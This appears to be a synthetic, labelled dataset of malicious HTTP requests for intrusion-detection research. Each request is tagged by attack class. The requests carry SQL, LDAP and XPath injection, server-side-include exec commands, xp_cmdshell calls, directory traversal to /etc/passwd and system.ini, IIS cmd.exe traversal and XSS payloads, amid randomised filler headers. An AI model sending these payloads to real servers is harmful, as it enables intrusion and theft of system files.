Client-ip: 111.28.164.122
Cookie: vBtfHdQ=iiftu0oestbsPymd;vleoTbrhaper=sm74CQ;qtsktn=o$ny;etyasYd=I 5nssock_streamrexyeln;Ry85styleacN=uioars
Cookie2: $Version="6"
Date: Thu, 05 Jan 06 04:36:19 CET
Expect: 3edmta6m
From: nedh@e0uheaoepd.com
If-Modified-Since: Fri, 11 Jan 08 01:04:23 UTC
If-Unmodified-Since: Wed, 01 Mar 06 12:12:13 CET
If-Match: "gj-B.6huX2MYH8m"
If-None-Match: *
If-Range: *
Max-Forwards: 949
Pragma: no-cache
Proxy-Authorization: Basic bm9ldzhpdTpuaHRubw==
Authorization: Digest username="1oupNa6o"
Range: 8-710
Referer: /htlanlf/mhjfeo.jsp
TE: trailers
User-Agent: yEejao9rf/0.6.6.1.7
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 412x6538
Via: FTP/2.1 www.urtrtS.png, 3.4 185.51.60.13:2, 3.9 www.hamtonze.gif
Transfer-Encoding: aeee; a4llina=digofn
Upgrade: odsrn/7.3, noifE/8.7
Warning: 364 www.snye8.shtml "eosaaz" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

bitjnebGdtsfo=;$zlsn'ji+&hl6Iotsue=9603016&i6Hm=tmphroifusrwe/2 nn&ou0ernt8=61910&itb=647975&182uHTG=6&dtay7fxtoi=tm$iat3'betweentaeln&i1be9-k=24476&nzeuhedeIbs=31756&nivhaee=38815715

End - Id: 50029
Start - Id: 48038
class: XSS
GET /ay/iscmesjtttsthhLt/hUCSm7_m632X6Onax/HWMHcF/gUlFl/s3mASaruftteoU/ax6uD4iId5u49sx8l/HE2wJOG0nQ/v3qRZawa8jMLbU_@J/trec9enbuhnrbD/40z8m4bAryvN4wl1lv_/a7lalenleniFsy5saita.asp?i1ss=2590126&o4rsstocepn1ev=%3Cdiv+++style++++%3D++%22+binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.nsni.com%2Fscript%2Fadneeki.asmx%5D%29%3B+++++%22++%3E&qtDpdaoct=icregadaeocolh9&pwogDlshftieset=9623786 HTTP/1.0
Host: www.uxrm.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=830
Client-ip: 57.224.52.157
Cookie: GPckW=9185736;uo7uetushcN=uscriptaxmlEaa+o5et;LVUestdinOx6K5=86;nenedwcino3= atqo
Cookie2: $Version="85"
Date: Wed, 21 Apr 10 15:18:18 GMT
ETag: W/".qoIWGMLllhfrRTCZtI"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Wed, 19 Aug 09 07:10:24 GMT
If-Unmodified-Since: Mon, 12 Apr 04 07:01:40 GMT
If-Match: "L.-Y4av_4D01@iUUh"
If-None-Match: "FxMNT_fPkXuak5Nm8"
If-Range: Thu, 20 Jul 06 11:31:49 GMT
Max-Forwards: 546
MIME-Version: 4.1
Pragma: e='7ebs'
Proxy-Authorization: Digest opaque="hyni"
Authorization: Basic Nmx3bm9oZTpFbW5vdHRj
Range: -108,-2477,99-66895
Referer: /iosn/ivli4q/hc7ehas.mdb
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/6.1 (X11; U; SunOS sun4u 0.0; ea-eL; rv:9.8.7) Gecko/03333581
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: zirf/4.5 www.1f6n.html, 5.4 51.103.65.244:75652, 6.3 www.tu1s.jpeg
Transfer-Encoding: deflate
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48038
Start - Id: 40124
class: SSI
GET /OVgQX-1hh_2/h@ZbfA/r9lOrp4d2ts/l-Udv/me3Rwhhss/56m6nT1jpb5FK/gNnriF3hTastm.html?ioahasOs=%3C%21++%23%3C%21--%23exec+++cmd%3D%22id%22--%3E&zlEreeris=37382&UTo=d2r0hgnwryUNp&exmjtDf=21664&rl0ruy1ihc=sn%7Ccqfns+V++taodE&7cneTaRsceiem=1546521 HTTP/1.1
Host: www.iNer.org:80
Connection: aIRn4lt
Accept: */*
Accept-Charset: shift_jis;q=0.7, windows-1252, x-mac-cyrillic;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 247.83.203.236
Cookie: eNnpNd=1524901
Cookie2: $Version="0"
Date: Wed, 31 Aug 05 20:27:09 CET
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Tue, 11 Mar 08 14:54:46 GMT
If-Unmodified-Since: Fri, 16 May 08 24:37:33 GMT
If-Match: "i6y-8qpIzMpuDJTrZ0"
If-None-Match: "Pw-PEHSG_OvToM9V"
If-Range: *
Max-Forwards: 90
MIME-Version: 9.5
Pragma: t5the=teeo
Proxy-Authorization: nCnw eRpaem=hnrtT
Authorization: Osr83 ts5n=qnhBnoo
Range: 7457-,9-
Referer: /obnnlc.msf
TE: deflate
Trailer: Connection
User-Agent: Mozilla/0.8 (compatible; MSIE 1.1; Solaris; litttwtw; fobe0g)
UA-CPU: Sparc
UA-Disp: 6012,9490,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 768x931
Via: FTP/7.1 www.iaaitnwc.gif:19845, 2.6 131.29.96.60
Transfer-Encoding: mts9ws; kioho=gnahm
Upgrade: cCeeG/6.9, rnime/3.6
Warning: 580 www.48eepRt.jpg "otrmnt" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 42315795
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40124
Start - Id: 44799
class: PathTransversal
GET /eW40H_J9_n0PyNG/g1bn/v8zVNbeI/hevalL5_tAKpHtelnetQt8p/e.iEcQSQs3/0uus/beleoeReaetseiM/lsbEterlttixetd.gif?lneeoAmd7Imlld=569&hAitb=46226&baoeA=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&0Jeeoa1ect=1904&Rhourheao=55&dfidp=2898919&s8YkwHy=746473199&tkens=1723&getETsre=19&qTYB=h80TN_&jbavssulL48Dt4d=NiaDa3 HTTP/1.1
Host: www.ke9e.uk
Connection: keep-alive
Accept: image/png;q=0.3, audio/*;q=0.8, text/xml;q=0.2
Accept-Charset: iso-8859-4, windows-1257;q=0.2, utf-8;q=0.9, windows-1254, iso-2022-kr;q=0.4
Accept-Encoding: identity, gzip;q=0.5, deflate;q=0.8
Accept-Language: qus-m, ehpr-tlpmtus;q=0.5
Cache-Control: max-stale=99726
Client-ip: 251.54.255.245
Cookie: 2toh3t1aedimlRb=r:sxp_y
Cookie2: $Version="73"
Date: Wed, 27 Oct 04 14:29:55 GMT
ETag: W/"djyw31vse5DU8jEaNO_"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 19 Jul 05 15:44:20 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Sep 09 11:40:45 GMT
Max-Forwards: 02
MIME-Version: 7.4
Pragma: 7erira=rnd
Proxy-Authorization: Digest qop=auth
Authorization: rldnpD 5eeMee=beaoeu
Range: -31658,860-,84040-975982
Referer: /ekposote/mAabi7/ildq3q6.php
TE: trailers,deflate,gzip
Trailer: Pragma
User-Agent: Mozilla/5.1 (Machintosh; U; PPC Mac OS X 9.5; Th-sq; rv:1.3.1) Gecko/01282120
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 4.5 182.36.213.142, FTP/1.0 57.54.96.233, HTTP/6.4 220.191.149.19
Transfer-Encoding: ncqru; klDi=mthma
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 42053074878
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44799
Start - Id: 41805
class: SqlInjection
GET /xq/tQ0ydelete.php?injeiS9sloekE5=tidfrO&oh=OrigText%27OR%27Fe%27+++%3D++++%27diotfmhou%27 HTTP/1.0
Host: www.9tweferT.uk
Connection: yseh8i
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.7, big5, euc-tw, x-mac-arabic
Accept-Encoding: deflate;q=0.4
Accept-Language: ly-esnowaEy;q=0.6, ajle1suu-p, oEohnioi-geea8a;q=0.0
Cache-Control: min-fresh=2
Client-ip: 175.74.180.28
Cookie: ttdZlg=g82p4NkT;zlo21rd=lsg
Cookie2: $Version="6"
Date: Fri, 07 Mar 08 19:20:16 UTC
ETag: W/"B9vez_6N2C2hWas2l"
Expect: tia3Rge
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 30 Jul 09 02:26:45 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 02:38:58 CET
Max-Forwards: 5
MIME-Version: 4.3
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Digest response="AfBa693E738c5312C3cc598A5b18d363"
Range: 340098-821
Referer: /hmrcR0/saat.jpg
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.9 (compatible; MSIE 0.9; WinNT; awaa)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7848x368
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41805
Start - Id: 41002
class: SqlInjection
PUT /jvjpU/h0B9.9qVj6Iowfwk-/nvLumail_rLIzexecDK/aoybAmBrkc.gif? HTTP/1.0
Content-Length: 261
Content-Language: 7e
Content-Encoding: compress
Content-Location: http://top6jr2u.org/hCea1.jsp
Content-MD5: aGNlbGV0ZWl3c3dhaWRnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Sep 04 17:54:36 GMT
Last-Modified: Wed, 21 Sep 05 12:11:13 CET
Host: www.stlzyrte.uk
Connection: e8ir
Accept: audio/*;q=0.3, audio/*;q=0.7, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 86.11.222.202
Cookie: T-.v=likehh)metcfEt/;Oz5q=oxhyrns;lLYgBchildG=Ia9utmtt
Cookie2: $Version="889"
Date: Thu, 19 Feb 09 19:44:02 GMT
ETag: W/"ttK7SB6OjXLRdJ0C"
Expect: 100-continue
From: syMege@l8wshrfu.st
If-Modified-Since: Fri, 06 Oct 06 09:10:21 CET
If-Unmodified-Since: Sat, 01 May 04 21:34:38 CET
If-Match: *
If-None-Match: "bDO56@3M8lka6z_p-mb"
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 2
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: http://c8A9teew.com/rrpzLide/jeoNt.cfm
TE: chunked;q=0.5,trailers
Trailer: Expect
User-Agent: a0So7 (aqggtosglB; hJdMLeV)
UA-Pixels: 892x2342
Via: HTTP/1.6 www.n6i3esI.html:06
Transfer-Encoding: gzip
Warning: 868 www.enucvtms.jpeg "mdaiyne" 
X-Forwarded-For: 250.186.208.209
X-Serial-Number: 0694203566390094
----: ------------

Bock=stsdaefnA8rgeuo&esnsqe=';EXEC  master.dbo.xp_cmdshell    'cmd.exe&fnct4id=scg8GN&e3aotx=itnph-H]&ln=4oAiciaeinscere&9nc=9935478&tseA=23367&uodisaO=21826&entmi=ooq9&xod426eadalr5=m4tah&hssOLoBnea89om=;lt6&uetoa2enotKHp=aihypYg5g&qqYx=taeehnmnaeysg

End - Id: 41002
Start - Id: 38977
class: LdapInjection
GET /NLoy/otNogbem5tLnit/dwM/ba/t3OtRXkz8J4/tftdjiug/cudnytac7nksftw8/uPfydtayHetste/5ZTVJUm4E29xJNiAZBh/anFBS-HAPEB.htm?hac2a76ej=859703&zydchrtmS8si=gophVu&asmbglieqssw=9&dtowm7aN=snr2ar&str6crtjD3h=%27&vg2=asee&eug784oeMc=i&enUsuYeatiitaHj=278095&asdeithln=mLWGnxNiV&4pd=h7rhsieete&qd3onergrd6ta7=c4ede%29%28+++%7C++%28hm%3D*%29&Sod8hre1w0a=1993025 HTTP/1.0
Host: www.eiao.de
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, euc-jp, utf-7;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: ph=WdJ4
Client-ip: 39.110.44.223
Cookie: yrTKYD=rgdsjmddTcephh4ed5
Cookie2: $Version="732"
Date: Sun, 16 Sep 07 11:45:54 UTC
If-Modified-Since: Sat, 13 Jan 07 02:45:34 CET
If-Unmodified-Since: Thu, 23 Jul 09 24:37:49 UTC
If-Match: "Dk-gsuhCzcfz8M1lkit"
If-None-Match: *
If-Range: Sun, 22 Feb 04 15:56:10 CET
Max-Forwards: 290
MIME-Version: 8.0
Pragma: ebl3JI='e'
Proxy-Authorization: NTLM b2U0dG1pcGUyMXNhZndtc2VMNG11c2Vsc3JzaW5mblJ4c3Rpc2huMGZzZw==
Authorization: Basic MGRsdWQ6ZG5zYWc=
Range: -026476,-042,-27632
Referer: /eh53h/xireh/iwb4n.php
TE: gzip;q=0.8,chunked;q=0.2
Trailer: Max-Forwards
User-Agent: tArscsehBw (0Jeikb; rN9wmOM; rg3Pz5V; h7THck; fAyEV.hQN)
UA-Pixels: 8193x847
Via: 7.5 www.uuwuwE.gif, 4.1 www.rsgtnt.jpg
Transfer-Encoding: ouat; nwMsn=ctyo
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------

null

End - Id: 38977
Start - Id: 45988
class: PathTransversal
POST /krr2/QRwherepjmIS@ZsJTO/zL40vaD6quD1/o7sZ/WOozh7nH/cw0oL/s8-d17.dll? HTTP/1.1
Content-Length: 58
Content-Language: esee
Content-Encoding: compress
Content-Location: /i5sdi/istmm4e/oqihvs.asmx
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 16 Jan 08 02:50:19 GMT
Host: www.rrgtoayai.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: hz-gb-2312, big5;q=0.1, x-mac-japanese
Accept-Encoding: 
Accept-Language: /../../../../Inetpub/iissamples/learerra/ergeetalre/stchit/eltrolnide.php
Cache-Control: only-if-cached
Date: Sat, 24 Sep 05 23:09:18 CET
If-Range: "a@J55BqXDm8tXzf"
MIME-Version: 5.9
Referer: http://www.l29fsT.net/dhsifwSu/ROwrip.css
TE: trailers
User-Agent: sOVdJR_Q6 http://www.neyecpoe.it
Upgrade: oslm/8.0, rot68/4.3, htrf/4.1

teeob5=nhtjbcahttpfW&nslGeop3une=ttjouaenrr&y1V=3624046960

End - Id: 45988
Start - Id: 46420
class: PathTransversal
GET /7o0rFfrirueapf/dhNha8aTOim/o67HRTQrR496vRKgGBY/b7enacllefn/cvG8yGixd.ghX_T/T@I_05wp-/wYm/nVWVMuEvSF/tns2nS.pl?ei3ne5n4nir=ml1location6&R3Rur4erts=esamc+6&slot=9948267&nsPwldw=67&edr=3806464&YNRFDj0Rw4fZ=088532&sui=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.0
Host: 5.99.197.185
Connection: close
Accept: application/*
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.4
Accept-Language: tnn1lav-nhip
Cache-Control: min-fresh=306
Client-ip: 246.216.165.119
Cookie: nudaDssseaRindr=aamtna<'f
Cookie2: $Version="1"
Date: Tue, 05 Sep 06 13:28:22 CET
ETag: W/"oNNawAhg-g-kXdiZ"
Expect: 100-continue
If-Modified-Since: Thu, 23 Jul 09 19:54:20 CET
If-Unmodified-Since: Wed, 21 Apr 04 06:25:15 CET
If-Match: *
If-None-Match: ".RpAnNR_VQY1BZ-HZE9"
If-Range: Thu, 24 Jun 04 10:45:35 GMT
Max-Forwards: 1
MIME-Version: 1.3
Pragma: emse5ea=t
Proxy-Authorization: Basic NWNzdDo3d0Q1bGVk
Authorization: sfws er9q=Anee9o
Referer: /A5n5s4n1/tadno/trbOoot.php4
TE: gzip;q=0.5,deflate,trailers
Trailer: Trailer
User-Agent: geei/9.0.3.6.0
UA-CPU: x86
Via: 6.7 18.241.132.150, FTP/7.2 183.79.25.16:01
Transfer-Encoding: gzip
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 429 24.50.149.83 "9lsW0lcrdoer" "Sun, 15 Jun 08 06:40:22 UTC"
X-Forwarded-For: 242.103.195.112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46420
Start - Id: 45993
class: PathTransversal
PUT /uG_Ir/betumeTpbsEasaaiyn/s6i7td4rttmmanelsi/lFR6-@Pzl351Q2Y/I@T_en4zQTy5Dqo/HidZd3Jrs/dXz.jpg? HTTP/1.0
Content-Length: 97
Content-Language: alofli,fieji
Content-Encoding: gzip
Content-Location: /telcmg/paT8/botr.dll
Content-MD5: bDI3bmVoYWVFbDhTZXBiRg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Dec 05 23:48:08 UTC
Last-Modified: Fri, 05 Mar 04 14:59:44 GMT
Host: www.aks0nfdrtl.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nwf6ee1-stiFdnx, ohT0t-ia4mu;q=0.9
Cache-Control: igr2zdh8='ei'
Client-ip: 243.169.251.155
Cookie: ffrai2rnihiont4=hnbfsodu;sNex0=yje;kwIdarsg;ecO14s5snNt=nFi;gsrnrinmnile=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
Date: Mon, 03 Aug 09 03:04:28 GMT
ETag: W/"lFTRIJaBphSaD09"
Expect: E8het
From: h4leog@lneuabul.uk
If-Modified-Since: Tue, 19 Jun 07 12:48:27 GMT
If-Unmodified-Since: Tue, 03 Apr 07 19:51:31 GMT
If-Match: *
If-None-Match: "ILy_djoiX7VOzWt0"
If-Range: Fri, 12 Mar 10 09:53:28 UTC
Max-Forwards: 299
MIME-Version: 8.3
Pragma: jtxaoO='d5AIt'
Authorization: NTLM ZGJseGVvbXRzaWxsc3Q0YmRyZGFnYXRzbm9uZXRhaXppYWRzdEpvcmVhbjdhOW0=
Range: 44665-,552-,1-
Referer: /l1rtH/s5nhyso/ihQwto/cE16ky.conf
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: lomitwgletcanienn
UA-CPU: Sparc
Via: efnmhg/2.2 32.58.127.126, reeeTs/9.0 215.57.237.7
Transfer-Encoding: compress
X-Serial-Number: 30022157350213308791
~~~~~: ~~~~~~~~~~~~~~~~

n8q=ossinueu9&8ohuoat9a=rh78ayjotrotl&eeeteondnnc=afx&ee=osuidyx\&7pwae=hwf&vtAxioe3a3ar7=76579

End - Id: 45993
Start - Id: 44042
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 74.140.28.203:80
Connection: close
Accept: text/*;q=0.8, image/*, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: teec='alSs'
Client-ip: 199.92.23.73
Cookie: iLatApTcot=26621;a2eOorjns=ltelnet2o5;rideY9=otehOi;msdEioterai4onM=Rioos;xre5fhaieaamE=/e/j ata
Cookie2: $Version="4"
Date: Tue, 26 Dec 06 02:25:37 GMT
ETag: "8UxO4gjUxGz_xq4DjY"
Expect: ehwes=nuc4cz
From: 6aep@Eebnu.org
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Thu, 10 Jul 08 06:11:38 GMT
If-Match: *
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Fri, 24 Sep 04 13:29:54 UTC
Max-Forwards: 58
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /ilo2rp/In4ere/rignfan/snDwrsy/hrnt.jpg
TE: trailers,trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: jaEhr4Sa/1.9.0.0.6
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: 6.7 151.240.242.79:1499, FTP/5.5 www.enRa.tiff
Transfer-Encoding: gzip
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44042
Start - Id: 44134
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ei5s9.com:80
Connection: decl2si
Accept: audio/x-wav;q=0.9, audio/*;q=0.9, audio/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-age=1769
Client-ip: 139.133.159.204
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="549"
Date: Fri, 18 Jan 08 12:55:19 UTC
ETag: W/"ukmlmXx@NvRSENV"
Expect: a4isd=lhzrab3;nfrsWe=ryefi
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "cDbyYOpWDU8CZza7j"
If-None-Match: "ih17kaI.mmiMAkJC78"
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 5
MIME-Version: 2.6
Pragma: s='wxse'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: Basic eWVsZXJvN1I6b3ZybU1uZQ==
Range: 2856-325921,765830-7785,3752-597
Referer: http://www.ymoe.it/erheds/dqqbl.sh
TE: trailers,trailers
Trailer: Upgrade
User-Agent: seohlpsin/4.1.8.4
UA-CPU: 68000
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: compress
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44134
Start - Id: 48357
class: XPathInjection
GET /pS0EpE4/hqTCpVcGLqpqFQ/window.openwV/on7ezg2ADACywc/sJVq1/lu1narerbl/nhs/hUFyNNNnLi8g.js?wr=82 HTTP/1.1
Host: 44.129.124.61
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 9af4s/bcouFi/i/child::node()[position()=18] or  '0fetVeo'  =  '
Cache-Control: no-store
Client-ip: 107.146.131.163
Cookie: a1adtNn=sdXL70fS4_s;ei=01611680
Cookie2: $Version="0"
Date: Fri, 13 Jan 06 05:35:41 CET
ETag: W/"DiaYz0AA1cS12qGseo"
Expect: 100-continue
From: aloit2ef@imcvhU.st
If-Modified-Since: Sun, 13 Jul 08 16:35:03 CET
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "2MDIVp-vpmp3HPHnyD.p"
If-None-Match: "VeLF0z@j3li3H3diVAy"
If-Range: *
Max-Forwards: 01
MIME-Version: 4.9
Pragma: 2sq='mnpo'
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: idn2 t3g6oh4=t46e
Range: -579124,02412-
Referer: /nplent.msf
TE: gzip;q=0.9,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 4.9; bZ-te; rv:5.7.4) Gecko/27752591
UA-Color: color32
UA-Pixels: 784x5970
Via: HTTP/9.6 www.bpfa.gif, 0.2 www.5irec.jpg, 9.1 www.NpeEl.html
Transfer-Encoding: identity
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 2527900
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48357
Start - Id: 39347
class: SSI
GET /eZhSX0bCG/in/fQKz/body-7Gid1wnAtmpAo/oaegV8sniQeqnsdwon/ooEJNFn@Z7LBpZbGNqs/e2/dy/dS494ET@7MjV.png?e8jHedirqiwhhcu=0&uw=gomochav%3Derhsock_streamhYcnEduzxp_&tsxhtho=+%7Eei%2Fodeeto&nesoa8aos=sb4cTusq9Rrx&e5etl7eecsai=8Bh1ei&lseyatleseehnat=57308317&ntLa=o&qle=o9wes4tdse3hiraob&tisqh2bur6b=dUiaciprE&2t5=%3C%21--%23email+fromhost%3D%22www.l2rqdgi2.com%22+tohost%3D%22mailbox.rai.com%22+message%3D%22zeok+rrtrae+noh+o4si%22+fromaddress%3D%22ntwavh.com%22+toaddress%3D%22ldar.1sm8b.com%22+subject%3D%22nc%22+sender%3D%22teE.com%22+replyto%3D%22swrrin.com%22+cc%3D%228Ais%22+inreplyto%3D%22ioc+qhUt+hox%22+id%3D%22eommail%22+--%3E HTTP/1.0
Host: 206.76.192.152:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1250;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: sstrlprl-nlliu1Og;q=0.8, Sor-LTdmsws;q=0.0, cojbwce-grt;q=0.4, eviGt-v1sd;q=0.2, tft-92faths;q=0.7
Cache-Control: no-cache
Client-ip: 199.161.172.175
Cookie: GA.Eph=ptae6s0InhhintmpoMe;ZHUUa_9=h3>afl;HKry_XEQezXI=r ;tyrurosomesd8o=agrenhcen3kr;aypSoijurcoS=7;tuyO0nefppArIks=mocharlishtpass iparoam7
Cookie2: $Version="74"
Date: Thu, 01 Nov 07 22:57:30 UTC
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Wed, 17 Jun 09 05:54:33 UTC
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: "Khm6Ca4oo_r1b1gXw7"
If-Range: *
Max-Forwards: 7075
MIME-Version: 2.9
Pragma: nn=tmaee
Proxy-Authorization: Basic MkVhaTU6ZTJuVHRo
Authorization: Basic c2FJYmV5OmV3dGZiNA==
Range: 6952-979,203706-973
Referer: http://www.6e8mm2.uk/ra3tm/i8eqdzah/nhr8nl/aminas.exe
TE: trailers,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/6.4 (X11; U; Linux i586 2.0; xs-ns; rv:8.6.1) Gecko/50278752
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5277x2991
Via: pol1et/3.2 208.247.58.3, tgeld/5.6 26.150.182.93:087
Transfer-Encoding: 6m4f; thuaijt=aeYeat
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 168.152.115.238
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39347
Start - Id: 46513
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: 114.88.3.18
Connection: keep-alive
Accept: audio/basic, audio/*;q=0.0, audio/basic;q=0.2
Accept-Charset: iso-2022-jp;q=0.1
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: snqten6=t
Client-ip: 217.88.94.178
Cookie: sohHReg=54998065;gglta4euplin=wSge>ebd
Cookie2: $Version="1"
Date: Sun, 27 Nov 05 14:14:46 GMT
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 100-continue
From: csa3iee@teat.com
If-Modified-Since: Sun, 05 Oct 08 09:48:09 GMT
If-Unmodified-Since: Tue, 27 Apr 04 06:36:17 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 27 May 08 10:47:23 GMT
Max-Forwards: 8377
MIME-Version: 0.6
Pragma: no-cache
